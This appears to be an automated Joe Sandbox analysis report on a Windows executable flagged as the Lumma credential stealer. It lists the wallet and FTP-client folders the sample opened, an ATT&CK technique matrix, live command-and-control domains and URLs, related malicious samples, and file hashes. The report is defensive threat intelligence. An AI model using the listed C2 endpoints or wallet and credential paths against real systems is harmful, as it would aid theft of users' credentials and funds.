        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
        Windows Management Instrumentation
        1
        DLL Side-Loading
        211
        Process Injection
        23
        Virtualization/Sandbox Evasion
        2
        OS Credential Dumping
        1
        Query Registry
        Remote Services1
        Screen Capture
        21
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        PowerShell
        Boot or Logon Initialization Scripts1
        DLL Side-Loading
        1
        Disable or Modify Tools
        LSASS Memory231
        Security Software Discovery
        Remote Desktop Protocol1
        Archive Collected Data
        1
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)211
        Process Injection
        Security Account Manager23
        Virtualization/Sandbox Evasion
        SMB/Windows Admin Shares41
        Data from Local System
        3
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
        Deobfuscate/Decode Files or Information
        NTDS1
        Process Discovery
        Distributed Component Object Model2
        Clipboard Data
        114
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
        Obfuscated Files or Information
        LSA Secrets1
        File and Directory Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Software Packing
        Cached Domain Credentials22
        System Information Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Timestomp
        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading
        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        random.exe68%VirustotalBrowse
        random.exe71%ReversingLabsByteCode-MSIL.Trojan.LummaStealer
        random.exe100%Joe Sandbox ML
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://aleksandr-block.com/6C0%Avira URL Cloudsafe
        https://aleksandr-block.com/pie0%Avira URL Cloudsafe
        https://aleksandr-block.com/0%Avira URL Cloudsafe
        https://aleksandr-block.com:443/apicrosoft0%Avira URL Cloudsafe
        owerinternal.sbs100%Avira URL Cloudmalware
        https://aleksandr-block.com/60%Avira URL Cloudsafe
        https://aleksandr-block.com/api100%Avira URL Cloudmalware
        NameIPActiveMaliciousAntivirus DetectionReputation
        aleksandr-block.com
        188.114.97.3
        truefalse
          high
          steamcommunity.com
          104.102.49.254
          truefalse
            high
            littlenotii.biz
            unknown
            unknowntrue
              unknown
              fraggielek.biz
              unknown
              unknowntrue
                unknown
                nuttyshopr.biz
                unknown
                unknowntrue
                  unknown
                  grandiouseziu.biz
                  unknown
                  unknowntrue
                    unknown
                    marketlumpe.biz
                    unknown
                    unknowntrue
                      unknown
                      spookycappy.biz
                      unknown
                      unknowntrue
                        unknown
                        owerinternal.sbs
                        unknown
                        unknowntrue
                          unknown
                          truculengisau.biz
                          unknown
                          unknowntrue
                            unknown
                            punishzement.biz
                            unknown
                            unknowntrue
                              unknown
                              NameMaliciousAntivirus DetectionReputation
                              littlenotii.bizfalse
                                high
                                https://steamcommunity.com/profiles/76561199724331900false
                                  high
                                  nuttyshopr.bizfalse
                                    high
                                    marketlumpe.bizfalse
                                      high
                                      spookycappy.bizfalse
                                        high
                                        owerinternal.sbstrue
                                        • Avira URL Cloud: malware
                                        unknown
                                        truculengisau.bizfalse
                                          high
                                          fraggielek.bizfalse
                                            high
                                            grandiouseziu.bizfalse
                                              high
                                              https://aleksandr-block.com/apitrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              punishzement.bizfalse
                                                high
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://aleksandr-block.com/6Crandom.exe, 00000003.00000002.2243730204.0000000000E33000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://aleksandr-block.com/pierandom.exe, 00000003.00000002.2243730204.0000000000E33000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://aleksandr-block.com:443/apicrosoftrandom.exe, 00000003.00000002.2243648609.0000000000DEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://aleksandr-block.com/random.exe, 00000003.00000002.2243648609.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000003.00000002.2243730204.0000000000E33000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000003.00000002.2244277691.00000000035C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://aleksandr-block.com/6random.exe, 00000003.00000002.2243648609.0000000000DEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://upx.sf.netAmcache.hve.6.drfalse
                                                  high
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  188.114.97.3
                                                  aleksandr-block.comEuropean Union
                                                  13335CLOUDFLARENETUSfalse
                                                  104.102.49.254
                                                  steamcommunity.comUnited States
                                                  16625AKAMAI-ASUSfalse
                                                  Joe Sandbox version:42.0.0 Malachite
                                                  Analysis ID:1590579
                                                  Start date and time:2025-01-14 09:52:06 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 4m 55s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:10
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:random.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.evad.winEXE@5/5@11/2
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HCA Information:
                                                  • Successful, ratio: 95%
                                                  • Number of executed functions: 40
                                                  • Number of non-executed functions: 102
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 20.42.73.29, 20.190.160.20, 13.107.246.45, 4.245.163.56
                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, 7.4.8.4.4.3.1.4.0.0.0.0.0.0.0.0.0.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  TimeTypeDescription
                                                  03:53:02API Interceptor10x Sleep call for process: random.exe modified
                                                  03:53:17API Interceptor1x Sleep call for process: WerFault.exe modified
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  188.114.97.3trow.exeGet hashmaliciousUnknownBrowse
                                                  • www.ftchat.com/
                                                  gem2.exeGet hashmaliciousUnknownBrowse
                                                  • wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                  qbSIgCrCgw.exeGet hashmaliciousFormBookBrowse
                                                  • www.zkdamdjj.shop/kf1m/
                                                  8L6MBxaJ2m.exeGet hashmaliciousFormBookBrowse
                                                  • www.rtpwslot888gol.sbs/jmkz/
                                                  1SxKeB4u0c.exeGet hashmaliciousFormBookBrowse
                                                  • www.rgenerousrs.store/o362/
                                                  suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                  • www.zkdamdjj.shop/swhs/
                                                  k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                  • www.einpisalpace.shop/8g74/?cNPH=WJ/rFpSuW7SUTonvHlYgJHet70+40/nSG+S456FFT70GKpWTD+yYW7KPXc3l6inPZ41lXlQU44ttBNcSIyPO/Awb2QEZq+eieNEXwOjUfdTJHvICblirwfj54bAbpLWz76fPuJmn0JFO&EtJTX=_JVX4ryxDRQpLJF
                                                  wWXR5js3k2.exeGet hashmaliciousFormBookBrowse
                                                  • www.supernutra01.online/rk61/
                                                  NWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                                                  • www.vh5g.sbs/rjsl/
                                                  KSts9xW7qy.exeGet hashmaliciousFormBookBrowse
                                                  • www.beylikduzu616161.xyz/2nga/?xP7x=Q2EbwnYhq4vEVEYxQpNjsu4gFlGHCs4lBliPtc8X0AIyDwowOCFGn/661E09vvaaF3LvgpjgW8Wvr6GWd63ULodNNE679jqiZ5mYQ2jjCrjO82Z0/3agI7E=&F4=Q0yHy
                                                  104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                  • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                  http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                  • www.valvesoftware.com/legal.htm
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  aleksandr-block.comyTRd6nkLWV.exeGet hashmaliciousLummaCBrowse
                                                  • 188.114.96.3
                                                  XhlpAnBmIk.exeGet hashmaliciousLummaCBrowse
                                                  • 188.114.96.3
                                                  k7h8uufe6Y.exeGet hashmaliciousLummaCBrowse
                                                  • 188.114.96.3
                                                  92.255.57_2.112.ps1Get hashmaliciousLummaCBrowse
                                                  • 188.114.96.3
                                                  steamcommunity.comyTRd6nkLWV.exeGet hashmaliciousLummaCBrowse
                                                  • 104.102.49.254
                                                  XhlpAnBmIk.exeGet hashmaliciousLummaCBrowse
                                                  • 104.102.49.254
                                                  k7h8uufe6Y.exeGet hashmaliciousLummaCBrowse
                                                  • 104.102.49.254
                                                  G7T8lHJWWM.exeGet hashmaliciousLummaCBrowse
                                                  • 104.102.49.254
                                                  92.255.57_2.112.ps1Get hashmaliciousLummaCBrowse
                                                  • 104.102.49.254
                                                  uo9m.exeGet hashmaliciousLummaCBrowse
                                                  • 23.197.127.21
                                                  uo9m.exeGet hashmaliciousLummaCBrowse
                                                  • 23.50.98.133
                                                  L7GNkeVm5e.exeGet hashmaliciousLummaCBrowse
                                                  • 104.102.49.254
                                                  NDWffRLk7z.exeGet hashmaliciousLummaCBrowse
                                                  • 104.102.49.254
                                                  g3toRYa6JE.exeGet hashmaliciousLummaCBrowse
                                                  • 104.102.49.254
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  CLOUDFLARENETUSTicketmaster #U00c2#U0156300 Cash2356899.pdfGet hashmaliciousUnknownBrowse
                                                  • 162.159.61.3
                                                  Signature Required_ Retail Technology Asia Employee Benefit for eddie.chan@rtasia.com.hk.emlGet hashmaliciousUnknownBrowse
                                                  • 104.17.25.14
                                                  https://Rtasia-sharepoint.zonivarnoth.ru/ITb4aThU/#Deddie.chan@rtasia.com.hkGet hashmaliciousUnknownBrowse
                                                  • 104.17.25.14
                                                  http://bombasml.esGet hashmaliciousUnknownBrowse
                                                  • 104.21.58.38
                                                  Absa Remittance Advice.docxGet hashmaliciousUnknownBrowse
                                                  • 172.67.70.147
                                                  Absa Remittance Advice.docxGet hashmaliciousUnknownBrowse
                                                  • 104.26.11.146
                                                  LN1lgDlZ8e.exeGet hashmaliciousUnknownBrowse
                                                  • 172.64.41.3
                                                  yTRd6nkLWV.exeGet hashmaliciousLummaCBrowse
                                                  • 188.114.96.3
                                                  XhlpAnBmIk.exeGet hashmaliciousLummaCBrowse
                                                  • 188.114.96.3
                                                  k7h8uufe6Y.exeGet hashmaliciousLummaCBrowse
                                                  • 188.114.96.3
                                                  AKAMAI-ASUSTicketmaster #U00c2#U0156300 Cash2356899.pdfGet hashmaliciousUnknownBrowse
                                                  • 184.28.88.176
                                                  yTRd6nkLWV.exeGet hashmaliciousLummaCBrowse
                                                  • 104.102.49.254
                                                  XhlpAnBmIk.exeGet hashmaliciousLummaCBrowse
                                                  • 104.102.49.254
                                                  k7h8uufe6Y.exeGet hashmaliciousLummaCBrowse
                                                  • 104.102.49.254
                                                  G7T8lHJWWM.exeGet hashmaliciousLummaCBrowse
                                                  • 104.102.49.254
                                                  possible SPAM## Msig Insurance Europe Complete via-Sign Monday January 2025.msgGet hashmaliciousUnknownBrowse
                                                  • 23.47.168.24
                                                  92.255.57_2.112.ps1Get hashmaliciousLummaCBrowse
                                                  • 104.102.49.254
                                                  https://fsgospefx6g2.sg.larksuite.com/wiki/Y7ybwFESRiirQPkoARZlhCyVgFb?Get hashmaliciousHTMLPhisherBrowse
                                                  • 2.19.126.80
                                                  https://staemcomnunlty.com/glft/91832Get hashmaliciousUnknownBrowse
                                                  • 2.19.126.91
                                                  https://fsgospefx6g2.sg.larksuite.com/wiki/Y7ybwFESRiirQPkoARZlhCyVgFb?Get hashmaliciousHTMLPhisherBrowse
                                                  • 2.19.126.83
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  a0e9f5d64349fb13191bc781f81f42e1yTRd6nkLWV.exeGet hashmaliciousLummaCBrowse
                                                  • 188.114.97.3
                                                  • 104.102.49.254
                                                  XhlpAnBmIk.exeGet hashmaliciousLummaCBrowse
                                                  • 188.114.97.3
                                                  • 104.102.49.254
                                                  k7h8uufe6Y.exeGet hashmaliciousLummaCBrowse
                                                  • 188.114.97.3
                                                  • 104.102.49.254
                                                  G7T8lHJWWM.exeGet hashmaliciousLummaCBrowse
                                                  • 188.114.97.3
                                                  • 104.102.49.254
                                                  92.255.57_2.112.ps1Get hashmaliciousLummaCBrowse
                                                  • 188.114.97.3
                                                  • 104.102.49.254
                                                  8e8JUOzOjR.exeGet hashmaliciousDBatLoaderBrowse
                                                  • 188.114.97.3
                                                  • 104.102.49.254
                                                  UTstKgkJNY.exeGet hashmaliciousDBatLoaderBrowse
                                                  • 188.114.97.3
                                                  • 104.102.49.254
                                                  On9ahUpI4R.exeGet hashmaliciousDBatLoaderBrowse
                                                  • 188.114.97.3
                                                  • 104.102.49.254
                                                  JDQS879kiy.exeGet hashmaliciousDBatLoaderBrowse
                                                  • 188.114.97.3
                                                  • 104.102.49.254
                                                  UAHIzSm2x2.exeGet hashmaliciousDBatLoaderBrowse
                                                  • 188.114.97.3
                                                  • 104.102.49.254
                                                  No context
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):65536
                                                  Entropy (8bit):0.8900778236915619
                                                  Encrypted:false
                                                  SSDEEP:96:2aFtYAO2bTX/s2tOujTOAqyS3QXIDcQlc6VcEdcw31+BHUHZ0ownOgHkEwH3dEFw:131pbTX/WA0LR3kauGzuiFxZ24IO8s
                                                  MD5:9D89F025FA9B294C7C91921252B6A913
                                                  SHA1:0584A3EFB62D695ABE34AA289DD4F240E751B26C
                                                  SHA-256:B5E690DE0B5D245C6BBE10B0E264654817727FBC4D73D39056C3228728A9AEF9
                                                  SHA-512:2FBB397D823F4EAB66132AFC0083224B190A00C1755AAF83B74823777F843F7D96CE7CEE19B6A9F9A4555645C73AEBECB4B8EBBF1FFCC49F44004A4A1F7C33DB
                                                  Malicious:true
                                                  Reputation:low
                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.3.1.8.3.8.2.9.0.8.5.6.8.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.3.1.8.3.8.3.3.7.7.3.2.9.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.5.f.2.1.f.c.e.-.8.3.4.5.-.4.e.b.4.-.9.3.2.7.-.b.2.1.6.b.1.c.a.3.0.5.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.1.a.b.7.9.a.f.-.b.8.a.1.-.4.1.5.f.-.b.a.9.d.-.d.7.6.a.5.2.2.c.6.0.a.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.a.n.d.o.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.r.a.s.d.l.u.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.b.8.-.0.0.0.1.-.0.0.1.4.-.3.a.a.6.-.d.e.b.7.6.1.6.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.0.9.c.7.0.1.5.2.1.1.1.1.7.5.9.b.d.9.b.5.0.9.9.5.7.1.c.0.3.3.d.0.0.0.0.0.9.0.4.!.0.0.0.0.3.0.e.f.a.e.5.a.5.5.0.8.7.4.1.d.0.f.5.3.7.f.f.9.b.8.b.b.c.0.4.b.7.b.e.1.c.3.0.f.!.r.a.n.d.
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):8382
                                                  Entropy (8bit):3.6899733609476795
                                                  Encrypted:false
                                                  SSDEEP:192:R6l7wVeJEf6Cb6YEILSUOuegmfxxVJ5prr89b+GsfekKm:R6lXJ86A6YEkSUO/gmfxxVJo+lfr
                                                  MD5:264B601CA9D8CDB16827FC2CA2ABA32D
                                                  SHA1:A62DC226F3C874EDFD2083BBF2FDC17AE1334C4A
                                                  SHA-256:492FE7C2BAEC92204853BAB57642A6931C13606BA0C3C8835B874DD215F5C92E
                                                  SHA-512:2AB4FD6F8460B8A55E19B1477D3F7885C73D5C49A59E99203C23697838EAB3B62510ECF5B201EE040BCA48FC43F8EA7D4BD0B6745DFED8A0893FFB31268D2270
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.6.0.<./.P.i.
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):4750
                                                  Entropy (8bit):4.444282186817806
                                                  Encrypted:false
                                                  SSDEEP:48:cvIwWl8zsHJg77aI9/qrRWpW8VYeYm8M4JQdxPcf6F/+q8vUdxPcfcl0QPjrd:uIjfpI75qrA7VyJhfUKFfBQPjrd
                                                  MD5:4414A6D6C8918EEAABE957B49D4A9561
                                                  SHA1:F0E6C98F9F05B079C29CF64C4319B6E4FE547CD0
                                                  SHA-256:E6A9943E1F7522FCF16B29D7686BF59DF4E65AD3214CBF729D12150C6CCA4333
                                                  SHA-512:5EA093734AF7658233345278D333230BB7854E0C3CA06F8CDDA4FBB9C75BD7DB48F37E2034ADF75662178640E0815DDFFECB0CB75D3744FD4EAB062FB06E7B71
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="675355" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:Mini DuMP crash report, 15 streams, Tue Jan 14 08:53:03 2025, 0x1205a4 type
                                                  Category:dropped
                                                  Size (bytes):154680
                                                  Entropy (8bit):3.7235125247985144
                                                  Encrypted:false
                                                  SSDEEP:1536:S2CspN4uE2aO2LTgFrOaoAf8tTDW3CD0quBojRmA:Sh64uEq2LTgFrwPW+0qm
                                                  MD5:3E4DA025691C678B7CCABF7F8B029661
                                                  SHA1:419AFE7CD52322463D81D0CE5DDA579AE908E27E
                                                  SHA-256:E8780C3C61F98B365A19B1FD6B0143EE22680DDDA5CFC7C3D07F738617A739EA
                                                  SHA-512:DD1FCB97A4367CC47C5565F2A93AE0228197F0199FFFB0B70382F7DC0198F752BDEFFBC931BE897E07D5D21BB4A6B5594745522BDC435AD00E41CD83314E87FF
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:MDMP..a..... ........%.g....................................$................/..........`.......8...........T...........($...8......................................................................................................eJ......P.......GenuineIntel............T............%.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:MS Windows registry file, NT/2000 or above
                                                  Category:dropped
                                                  Size (bytes):1835008
                                                  Entropy (8bit):4.422193860070036
                                                  Encrypted:false
                                                  SSDEEP:6144:NSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnN50uhiTw1:0vloTMW+EZMM6DFyX03w
                                                  MD5:AAC50C6DF214D352D2579DF17662DBFC
                                                  SHA1:DF578E004E2FCD4F3CC2783D4F3988B959A1C160
                                                  SHA-256:E130AB2DB1799205F711EC0C9D7894EF9B527CBD73F3C609ACEC96ABA7D51EEE
                                                  SHA-512:20A4673B553DD8349FB3F32B54E8A05C2A919C5E1CBE8BC3EC7F84EAA12A939619E3A1C718E0168933120E5BF111967E604271199CE103FFB49EC700EF39EEE0
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..T.af................................................................................................................................................................................................................................................................................................................................................C.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.966130692507315
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  File name:random.exe
                                                  File size:340'480 bytes
                                                  MD5:4283b9ebedc388abeaafa9cea78c1b70
                                                  SHA1:30efae5a5508741d0f537ff9b8bbc04b7be1c30f
                                                  SHA256:d5a861959e92c8a53a516c7438448396e7e433866488b01eba69354897ed5417
                                                  SHA512:bdc04f8c21f6f2025b946efbbc102d540e2041c755184061c043160bfca92b5368596a289dc6cd6e89b611c037ee013e5ab7ed4dce69cc39290101d173f72c2d
                                                  SSDEEP:6144:9WwfM7ZFvHHTG/nGo7P6F7zvgpkKqkKeplhz+hvHYuvErztWV4+4X:9z0D/TGfl7PGvgpkdkKe3h6Yust8e
